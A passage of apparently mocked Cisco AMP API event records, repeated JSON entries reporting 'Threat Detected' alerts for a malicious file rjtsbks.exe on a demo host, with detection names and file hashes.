Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163575","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163574","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163572","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163571","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163570","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163568","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":83000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163566","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163565","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163564","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":20000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163563","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":833000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196265","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":818000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196264","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196263","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":693000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":630000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196260","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":584000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":443000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196258","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 